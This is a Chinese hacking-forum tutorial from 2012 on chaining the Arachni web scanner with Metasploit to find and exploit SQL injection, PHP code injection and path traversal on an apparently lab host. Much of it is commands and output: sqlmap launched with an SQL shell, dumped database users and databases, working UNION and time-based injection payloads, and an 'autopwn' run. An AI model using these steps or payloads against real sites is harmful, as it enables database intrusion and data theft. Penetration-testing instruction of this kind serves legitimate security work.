切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
20. Metasploit 针对WEB的攻击[复制链接]
发表于 2012-8-6 16:25:09 | 显示全部楼层 |!read_mode!

#安装参考:http://www.dis9.com/tech/viewthread.php?tid=39&extra=
这个是一个自动化WEB安全检测工具,看官方咋吹的吧:
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.
本大菜B觉得LINUX没有比他更好的WEB扫描工具,如果他能更人性化点 =。= 这熊孩子

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling
through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly.
This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.

安装他

首先这些

  1. sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
复制代码
关键的gem install什么的没写,我就是个装B的,说白了咋也不会玩 爱看的看这里
然后获得源代码:

  1. git clone git://github.com/Zapotek/arachni.git
  2. cd arachni
  3. rake install
复制代码
然后就行了,记得rake的时候开代理 要不慢


然后复制到MSF插件:

  1. $ cp -R arachni/external/metasploit/* metasploit/
复制代码

恩,基本这样就行了,貌似应该就行了,用他来操站首先得用他扫描,然后用MSF利用,基本流程就这样。。。启动一个扫描

  1. root@Dis9Team:/pen/arachni/bin# ./arachni http://5.5.5.3/index.html --report=metareport:outfile=localhost.afr.msf
复制代码
输出是:localhost.afr.msf ,report 是metasploit,你懂的
然后这傻逼货就开始扫了


然后输入Ctrl + C 他会现实报告



你可以看下面这里,这傻逼货能做什么?

  1. Audit:
  2.         SQL injection
  3.         Blind SQL injection using rDiff analysis
  4.         Blind SQL injection using timing attacks
  5.         CSRF detection
  6.         Code injection (PHP, Ruby, Python, JSP, ASP.NET)
  7.         Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
  8.         LDAP injection
  9.         Path traversal
  10.         Response splitting
  11.         OS command injection (*nix, Windows)
  12.         Blind OS command injection using timing attacks (*nix, Windows)
  13.         Remote file inclusion
  14.         Unvalidated redirects
  15.         XPath injection
  16.         Path XSS
  17.         URI XSS
  18.         XSS
  19.         XSS in event attributes of HTML elements
  20.         XSS in HTML tags
  21.         XSS in HTML 'script' tags
  22.     Recon:
  23.         Allowed HTTP methods
  24.         Back-up files
  25.         Common directories
  26.         Common files
  27.         HTTP PUT
  28.         Insufficient Transport Layer Protection for password forms
  29.         WebDAV detection
  30.         HTTP TRACE detection
  31.         Credit Card number disclosure
  32.         CVS/SVN user disclosure
  33.         Private IP address disclosure
  34.         Common backdoors
  35.         .htaccess LIMIT misconfiguration
  36.         Interesting responses
  37.         HTML object grepper
  38.         E-mail address disclosure
  39.         US Social Security Number disclosure
  40.         Forceful directory listing
  41.         Mixed Resource/Scripting
  42.     Extras
  43.         SVN Digger dirs
  44.         SVN Digger files
  45.         RAFT dirs
  46.         RAFT files
复制代码


话说这傻逼货还真扫描出bug了


查看扫描结果必须要沐浴,head是个伟大的命令
  1. root@Dis9Team:/pen/arachni/bin# head localhost.afr.msf
  2. ---
  3. - !ruby/object:ArachniMetareport
  4.   category: n/a
  5.   description: SQL code can be injected into the web application.
  6.   exploit: unix/webapp/arachni_sqlmap
  7.   headers:
  8.     cookie: ""
  9.     From: ""
  10.     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  11.     User-Agent: Arachni/0.4.0.3
  12. root@Dis9Team:/pen/arachni/bin#
复制代码

说明有了。。。。。。。。metasploit的漏洞利用载入插件:
  1. msf > load arachni
  2. [*] Successfully loaded plugin: arachni
复制代码

载入扫描结果
  1. msf > arachni_load /pen/arachni/bin/localhost.afr.msf
  2. [*] Loading report...
  3. [*] Loaded 3 vulnerabilities.

  4. Unique exploits
  5. ===============

  6.     ID  Exploit                             Description
  7.     --  -------                             -----------
  8.     1   unix/webapp/arachni_sqlmap         

  9.         This module is designed to be used with the Arachni plug-in.

  10.         From the original:

  11.           This module launches an sqlmap session.
  12.         sqlmap is an automatic SQL injection tool developed in Python.
  13.         Its goal is to detect and take advantage of SQL injection
  14.         vulnerabilities on web applications. Once it detects one
  15.         or more SQL injections on the target host, the user can
  16.         choose among a variety of options to perform an extensive
  17.         back-end database management system fingerprint, retrieve
  18.         DBMS session user and database, enumerate users, password
  19.         hashes, privileges, databases, dump entire or user
  20.         specific DBMS tables/columns, run his own SQL SELECT
  21.         statement, read specific files on the file system and much
  22.         more.

  23.     2   unix/webapp/arachni_php_eval
  24.                                         This module allows complex HTTP requests to be crafted in order to
  25.                                 allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.

  26.                                 Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
  27.                                 i.e. where the payload should go.

  28.                                 Supported vectors: GET, POST, COOKIE, HEADER.
  29.                                 (Mainly for use with the Arachni plug-in.)

  30.     3   unix/webapp/arachni_path_traversal
  31.                                 It exploits path traversal vulnerabilities in order to read the contents of a remote file.
  32.                         It will also try to clean-up any HMTL code that does not belong to the file.

  33.                         This module is designed to be used with the Arachni plug-in.

  34. Vulnerabilities
  35. ===============

  36.     ID  Host     Path      Name                            Method  Params                     Exploit
  37.     --  ----     ----      ----                            ------  ------                     -------
  38.     1   5.5.5.3  /sql.php  SQL Injection                   GET     {"id"=>"1XXinjectionXX"}   unix/webapp/arachni_sqlmap
  39.     2   5.5.5.3  /sql.php  Code injection (timing attack)  GET     {"id"=>"XXinjectionXX"}    unix/webapp/arachni_php_eval
  40.     3   5.5.5.3  /1.php    Path Traversal                  GET     {"page"=>"XXinjectionXX"}  unix/webapp/arachni_path_traversal

  41. [*] Done!
  42. msf >
复制代码

查看脆弱应用
  1. msf > arachni_list_vulns

  2. Vulnerabilities
  3. ===============

  4.     ID  Host     Path      Name                            Method  Params                     Exploit
  5.     --  ----     ----      ----                            ------  ------                     -------
  6.     1   5.5.5.3  /sql.php  SQL Injection                   GET     {"id"=>"1XXinjectionXX"}   unix/webapp/arachni_sqlmap
  7.     2   5.5.5.3  /sql.php  Code injection (timing attack)  GET     {"id"=>"XXinjectionXX"}    unix/webapp/arachni_php_eval
  8.     3   5.5.5.3  /1.php    Path Traversal                  GET     {"page"=>"XXinjectionXX"}  unix/webapp/arachni_path_traversal

  9. msf >
复制代码

貌似有3个能用的。。利用个试试
就拿第一个试试这傻逼工具
  1. msf > arachni_manual 1
  2. [*] Using unix/webapp/arachni_sqlmap .
  3. [*] Preparing datastore for 'SQL Injection' vulnerability @ 5.5.5.3/sql.php ...
  4. SRVHOST => 127.0.0.1
  5. SRVPORT => 11356
  6. RHOST => 5.5.5.3
  7. RPORT => 80
  8. LHOST => 127.0.0.1
  9. LPORT => 13208
  10. SSL => false
  11. GET => id=1XXinjectionXX
  12. METHOD => GET
  13. COOKIES =>
  14. HEADERS => From=::Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.4.0.3
  15. PATH => /sql.php
  16. [*] Done!
  17. [-] Unknown variable
  18. Usage: set [option] [value]

  19. Set the given option to value.  If value is omitted, print the current value.
  20. If both are omitted, print options that are currently set.

  21. If run from a module context, this will set the value in the module's
  22. datastore.  Use -g to operate on the global datastore

  23. Compatible payloads
  24. ===================

  25.     Name  Description
  26.     ----  -----------

  27. Use: set PAYLOAD
  28. msf  auxiliary(arachni_sqlmap) >
复制代码

恩 都写入好了 下面咱们来运行
  1. msf  auxiliary(arachni_sqlmap) > exploit

  2. [*] exec: /pen/sqlmap/sqlmap.py -u 'http://5.5.5.3:80//sql.php?id=1' --users --dbs --sql-shell -v 0 --cookie ''

  3.     sqlmap/0.9 - automatic SQL injection and database takeover tool

  4. http://sqlmap.sourceforge.net

  5. [*] starting at: 05:13:29

  6. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
  7. sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
  8. ---
  9. Place: GET
  10. Parameter: id
  11.     Type: UNION query
  12.     Title: MySQL UNION query (NULL) - 1 to 10 columns
  13.     Payload: id=-8404 UNION ALL SELECT NULL, CONCAT(CHAR(58,115,107,115,58),IFNULL(CAST(CHAR(83,85,107,81,106,72,90,90,67,101) AS CHAR),CHAR(32)),CHAR(58,97,117,103,58))#

  14.     Type: AND/OR time-based blind
  15.     Title: MySQL > 5.0.11 AND time-based blind
  16.     Payload: id=1 AND SLEEP(5)
  17. ---

  18. web server operating system: Windows
  19. web application technology: Apache 2.2.21, PHP 5.3.8
  20. back-end DBMS: MySQL 5.0.11
  21. database management system users [6]:
  22. [*] ''@'localhost'
  23. [*] 'dis9team'@'%'
  24. [*] 'pma'@'localhost'
  25. [*] 'root'@'%'
  26. [*] 'root'@'127.0.0.1'
  27. [*] 'root'@'localhost'

  28. available databases [8]:
  29. [*] cdcol
  30. [*] information_schema
  31. [*] mysql
  32. [*] performance_schema
  33. [*] phpmyadmin
  34. [*] sql
  35. [*] test
  36. [*] webauth

  37. sql-shell>
复制代码

恩,成功了。。下面咱们来自动利用
说到这个自动利用貌似很牛B
  1. msf > arachni_autopwn -a
  2. [*] Running pwn-jobs...

  3. [*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
  4. [*] Running auxiliary/unix/webapp/arachni_path_traversal
  5. [*] Preparing datastore for 'Path Traversal' vulnerability @ 5.5.5.3/1.php ...
  6. [*] Running exploit/unix/webapp/arachni_php_eval
  7. [*] Preparing datastore for 'Code injection (timing attack)' vulnerability @ 5.5.5.3/sql.php ...
  8. [*] Running auxiliary/unix/webapp/arachni_sqlmap
  9. [*] Preparing datastore for 'SQL Injection' vulnerability @ 5.5.5.3/sql.php ...

  10. [*] Started bind handler
  11. [*] Sending HTTP request for /sql.php
  12. [*] [0 established sessions]): Waiting on 0 launched modules to finish execution...

  13. [*] The autopwn command has completed with 0 sessions
  14. msf >
复制代码

插件信息
  1. Arachni - Web Application Security Scanner Framework v0.4.0.3 [0.2.5]
  2.        Author: Tasos "Zapotek" Laskos

  3.                (With the support of the community and the Arachni Team.)

  4.        Website:       http://arachni.segfault.gr - http://github.com/Zapotek/arachni
  5.        Documentation: http://github.com/Zapotek/arachni/wiki

  6. [~] No modules were specified.
  7. [~]  -> Will run all mods.
  8. [~] No audit options were specified.
  9. [~]  -> Will audit links, forms and cookies.

  10. [~] Available plugins:

  11. [*] content_types:
  12. --------------------
  13. Name:                Content-types
  14. Description:        Logs content-types of server responses.
  15.                 It can help you categorize and identify publicly available file-types
  16.                 which in turn can help you identify accidentally leaked files.
  17. Options:
  18. [~]         exclude - Exclude content-types that match this regular expression.
  19. [~]         Type:        string
  20. [~]         Default:     text
  21. [~]         Required?:   false

  22. Author:                Tasos "Zapotek" Laskos
  23. Version:        0.1.3
  24. Path:        /pen/arachni/plugins/defaults/content_types.rb

  25. [*] uniformity:
  26. --------------------
  27. Name:                Uniformity (Lack of central sanitization)
  28. Description:        Analyzes the scan results and logs issues which persist across different pages.
  29.                 This is usually a sign for a lack of a central/single point of input sanitization,
  30.                 a bad coding practise.
  31. Author:                Tasos "Zapotek" Laskos
  32. Version:        0.1.1
  33. Path:        /pen/arachni/plugins/defaults/metamodules/uniformity.rb

  34. [*] timing_attacks:
  35. --------------------
  36. Name:                Timing attack anomalies
  37. Description:        Analyzes the scan results and logs issues that used timing attacks
  38.                 while the affected web pages demonstrated an unusually high response time.
  39.                 A situation which renders the logged issues inconclusive or (possibly) false positives.

  40.                 Pages with high response times usually include heavy-duty processing
  41.                 which makes them prime targets for Denial-of-Service attacks.
  42. Author:                Tasos "Zapotek" Laskos
  43. Version:        0.1.4
  44. Path:        /pen/arachni/plugins/defaults/metamodules/remedies/timing_attacks.rb

  45. [*] manual_verification:
  46. --------------------
  47. Name:                Issues requiring manual verification
  48. Description:        The HTTP responses of the issues logged by this plugin exhibit a suspicious pattern
  49.                 even before any audit action has taken place -- this challenges the relevance of the audit procedure.

  50.                 Thus, these issues require manual verification.
  51. Author:                Tasos "Zapotek" Laskos
  52. Version:        0.1.1
  53. Path:        /pen/arachni/plugins/defaults/metamodules/remedies/manual_verification.rb

  54. [*] discovery:
  55. --------------------
  56. Name:                Discovery module response anomalies
  57. Description:        Analyzes the scan results and identifies issues logged by discovery modules
  58.                 (i.e. modules that look for certain files and folders on the server),
  59.                 while the server responses were exhibiting an anomalous factor of similarity.

  60.                 There's a good chance that these issues are false positives.
  61. Author:                Tasos "Zapotek" Laskos
  62. Version:        0.1.1
  63. Path:        /pen/arachni/plugins/defaults/metamodules/remedies/discovery.rb

  64. [*] healthmap:
  65. --------------------
  66. Name:                Health map
  67. Description:        Generates a simple list of safe/unsafe URLs.
  68. Author:                Tasos "Zapotek" Laskos
  69. Version:        0.1.1
  70. Path:        /pen/arachni/plugins/defaults/healthmap.rb

  71. [*] autothrottle:
  72. --------------------
  73. Name:                AutoThrottle
  74. Description:        Monitors HTTP response times and automatically
  75.                 throttles the request concurrency in order to maintain stability
  76.                 and prevent from killing the server.
  77. Author:                Tasos "Zapotek" Laskos
  78. Version:        0.1.2
  79. Path:        /pen/arachni/plugins/defaults/autothrottle.rb

  80. [*] profiler:
  81. --------------------
  82. Name:                Profiler
  83. Description:        Examines the behavior of the web application gathering general statistics
  84.                 and performs taint analysis to determine which inputs affect the output.

  85.                 It does not perform any vulnerability assesment nor does it send attack payloads.
  86. Author:                Tasos "Zapotek" Laskos
  87. Version:        0.1.3
  88. Path:        /pen/arachni/plugins/defaults/profiler.rb

  89. [*] resolver:
  90. --------------------
  91. Name:                Resolver
  92. Description:        Resolves vulnerable hostnames to IP addresses.
  93. Author:                Tasos "Zapotek" Laskos
  94. Version:        0.1
  95. Path:        /pen/arachni/plugins/defaults/resolver.rb

  96. [*] cookie_collector:
  97. --------------------
  98. Name:                Cookie collector
  99. Description:        Monitors and collects cookies while establishing a timeline of changes.

  100.                 WARNING: Highly discouraged when the audit includes cookies.
  101.                     It will log thousands of results leading to a huge report,
  102.                     highly increased memory and CPU usage.
  103. Author:                Tasos "Zapotek" Laskos
  104. Version:        0.1.3
  105. Path:        /pen/arachni/plugins/cookie_collector.rb

  106. [*] waf_detector:
  107. --------------------
  108. Name:                WAF Detector
  109. Description:        Performs basic profiling on the web application
  110.                 in order to assess the existence of a Web Application Firewall.

  111.                 This is a 4 stage process:
  112.                    1. Grab the original page as is
  113.                    2. Send a lot of innocent (vanilla) strings in non-existent inputs so as to profile normal behavior
  114.                    3. Send a lot of suspicious (spicy) strings in non-existent inputs and check if behavior changes
  115.                    4. Make heads or tails of the gathered responses

  116.                  Steps 1 to 3 will be repeated _precision_ times (default: 5) and the responses will be averaged using rDiff analysis.
  117. Options:
  118. [~]         precision - Stage precision (how many times to perform each detection stage).
  119. [~]         Type:        integer
  120. [~]         Default:     5
  121. [~]         Required?:   false

  122. Author:                Tasos "Zapotek" Laskos
  123. Version:        0.1.1
  124. Path:        /pen/arachni/plugins/waf_detector.rb

  125. [*] http_dicattack:
  126. --------------------
  127. Name:                HTTP dictionary attacker
  128. Description:        Uses wordlists to crack password protected directories.
  129.                 If the cracking process is successful the found credentials will be set
  130.                 framework-wide and used for the duration of the audit.
  131.                 If that's not what you want set the crawler's link-count limit to "0".
  132. Options:
  133. [~]         username_list - File with a list of usernames (newline separated).
  134. [~]         Type:        path
  135. [~]         Default:
  136. [~]         Required?:   true

  137. [~]         password_list - File with a list of passwords (newline separated).
  138. [~]         Type:        path
  139. [~]         Default:
  140. [~]         Required?:   true

  141. Author:                Tasos "Zapotek" Laskos
  142. Version:        0.1
  143. Path:        /pen/arachni/plugins/http_dicattack.rb

  144. [*] libnotify:
  145. --------------------
  146. Name:                libnotify
  147. Description:        Uses the libnotify library to send notifications for each discovered issue
  148.                 and a summary at the end of the scan.
  149. Options:
  150. [~]         for_every_issue - Show every issue.
  151. [~]         Type:        bool
  152. [~]         Default:     true
  153. [~]         Required?:   false

  154. Author:                Tasos "Zapotek" Laskos
  155. Version:        0.1
  156. Path:        /pen/arachni/plugins/libnotify.rb

  157. [*] rescan:
  158. --------------------
  159. Name:                ReScan
  160. Description:        It uses the AFR report of a previous scan to
  161.                 extract the sitemap in order to avoid a redundant crawl.

  162. Options:
  163. [~]         afr - Path to the AFR report.
  164. [~]         Type:        path
  165. [~]         Default:
  166. [~]         Required?:   true

  167. Author:                Tasos "Zapotek" Laskos
  168. Version:        0.1
  169. Path:        /pen/arachni/plugins/rescan.rb

  170. [*] email_notify:
  171. --------------------
  172. Name:                E-mail notify
  173. Description:        Sends a notification (and optionally a report) over SMTP
  174.                 at the end of the scan.
  175. Options:
  176. [~]         to - E-mail address of the receiver.
  177. [~]         Type:        string
  178. [~]         Default:
  179. [~]         Required?:   true

  180. [~]         cc - E-mail address to which to send a carbon copy of the notification.
  181. [~]         Type:        string
  182. [~]         Default:
  183. [~]         Required?:   false

  184. [~]         bcc - E-mail address for a blind carbon copy.
  185. [~]         Type:        string
  186. [~]         Default:
  187. [~]         Required?:   false

  188. [~]         from - E-mail address of the sender.
  189. [~]         Type:        string
  190. [~]         Default:
  191. [~]         Required?:   true

  192. [~]         server_address - Address of the SMTP server to use.
  193. [~]         Type:        address
  194. [~]         Default:
  195. [~]         Required?:   true

  196. [~]         server_port - SMTP port.
  197. [~]         Type:        port
  198. [~]         Default:
  199. [~]         Required?:   true

  200. [~]         tls - Use TLS/SSL?.
  201. [~]         Type:        bool
  202. [~]         Default:
  203. [~]         Required?:   false

  204. [~]         username - SMTP username.
  205. [~]         Type:        string
  206. [~]         Default:
  207. [~]         Required?:   true

  208. [~]         password - SMTP password.
  209. [~]         Type:        string
  210. [~]         Default:
  211. [~]         Required?:   true

  212. [~]         authentication - Authentication.
  213. [~]         Type:        string
  214. [~]         Default:     plain
  215. [~]         Required?:   false

  216. [~]         report -  (accepted: txt, xml, html, json, yaml, marshalnone)
  217. [~]         Type:        enum
  218. [~]         Default:     txt
  219. [~]         Required?:   false

  220. Author:                Tasos "Zapotek" Laskos
  221. Version:        0.1
  222. Path:        /pen/arachni/plugins/email_notify.rb

  223. [*] proxy:
  224. --------------------
  225. Name:                Proxy
  226. Description:        Gathers data based on user actions and exchanged HTTP
  227.                 traffic and pushes that data to the framework's page-queue to be audited.
  228.                 It also updates the framework cookies with the cookies of the HTTP requests and
  229.                 responses, thus it can also be used to login to a web application.
  230. Options:
  231. [~]         port - Port to bind to.
  232. [~]         Type:        port
  233. [~]         Default:     8282
  234. [~]         Required?:   false

  235. [~]         bind_address - IP address to bind to.
  236. [~]         Type:        address
  237. [~]         Default:     0.0.0.0
  238. [~]         Required?:   false

  239. Author:                Tasos "Zapotek" Laskos
  240. Version:        0.1.2
  241. Path:        /pen/arachni/plugins/proxy.rb

  242. [*] form_dicattack:
  243. --------------------
  244. Name:                Form dictionary attacker
  245. Description:        Uses wordlists to crack login forms.
  246.                 If the cracking process is successful the found credentials will be set
  247.                 framework-wide and used for the duration of the audit.
  248.                 If that's not what you want set the crawler's link-count limit to "0".
  249. Options:
  250. [~]         username_list - File with a list of usernames (newline separated).
  251. [~]         Type:        path
  252. [~]         Default:
  253. [~]         Required?:   true

  254. [~]         password_list - File with a list of passwords (newline separated).
  255. [~]         Type:        path
  256. [~]         Default:
  257. [~]         Required?:   true

  258. [~]         username_field - The name of the username form field.
  259. [~]         Type:        string
  260. [~]         Default:
  261. [~]         Required?:   true

  262. [~]         password_field - The name of the password form field.
  263. [~]         Type:        string
  264. [~]         Default:
  265. [~]         Required?:   true

  266. [~]         login_verifier - A string that will be used to verify a successful login.
  267.                     For example, if a logout link only appears when a user is logged in then it can be a perfect choice.
  268. [~]         Type:        string
  269. [~]         Default:
  270. [~]         Required?:   true

  271. Author:                Tasos "Zapotek" Laskos
  272. Version:        0.1
  273. Path:        /pen/arachni/plugins/form_dicattack.rb

  274. [*] autologin:
  275. --------------------
  276. Name:                AutoLogin
  277. Description:        It looks for the login form in the user provided URL,
  278.                 merges its input fields with the user supplied parameters and sets the cookies
  279.                 of the response and request as framework-wide cookies to be used by the spider later on.

  280. Options:
  281. [~]         url - The URL that contains the login form.
  282. [~]         Type:        url
  283. [~]         Default:
  284. [~]         Required?:   true

  285. [~]         params - Form parameters to submit. ( username=user&password=pass )
  286. [~]         Type:        string
  287. [~]         Default:
  288. [~]         Required?:   true

  289. Author:                Tasos "Zapotek" Laskos
  290. Version:        0.1.1
  291. Path:        /pen/arachni/plugins/autologin.rb

  292. [*] beep_notify:
  293. --------------------
  294. Name:                Beep notify
  295. Description:        It beeps when the scan finishes.
  296. Options:
  297. [~]         repeat - How many times to beep.
  298. [~]         Type:        integer
  299. [~]         Default:     4
  300. [~]         Required?:   false

  301. [~]         interval - How long to wait between beeps.
  302. [~]         Type:        float
  303. [~]         Default:     0.4
  304. [~]         Required?:   false

  305. Author:                Tasos "Zapotek" Laskos
  306. Version:        0.1
  307. Path:        /pen/arachni/plugins/beep_notify.rb
复制代码
模块列表mods:
- interesting_responses
- http_put
- common_directories
- common_files
- mixed_resource
- credit_card
- html_objects
- captcha
- ssn
- private_ip
- emails
- cvs_svn_users
- xst
- allowed_methods
- backdoors
- htaccess_limit
- unencrypted_password_forms
- webdav
- directory_listing
- backup_files
- sqli
- csrf
- sqli_blind_timing
- xss_uri
- unvalidated_redirect
- xss_event
- trainer
- os_cmd_injection
- xpath
- response_splitting
- xss_path
- code_injection_timing
- code_injection
- ldapi
- rfi
- xss_script_tag
- xss_tag
- path_traversal
- sqli_blind_rdiff
- xss
- os_cmd_injection_timing
选择模块例如:
  1. root@Dis9Team:/pen/arachni/bin# ./arachni http://www.webscantest.com --report=metareport:outfile=1.afr.msf --mods=sqli,sqli_blind_timing,os_cmd_injection,xpath,code_injection,sqli_blind_rdiff,os_cmd_injection_timing
复制代码





附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2015-10-20 14:55:37 | 显示全部楼层
了解 学习了 。。

代码区

GMT+8, 2020-9-23 13:45

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部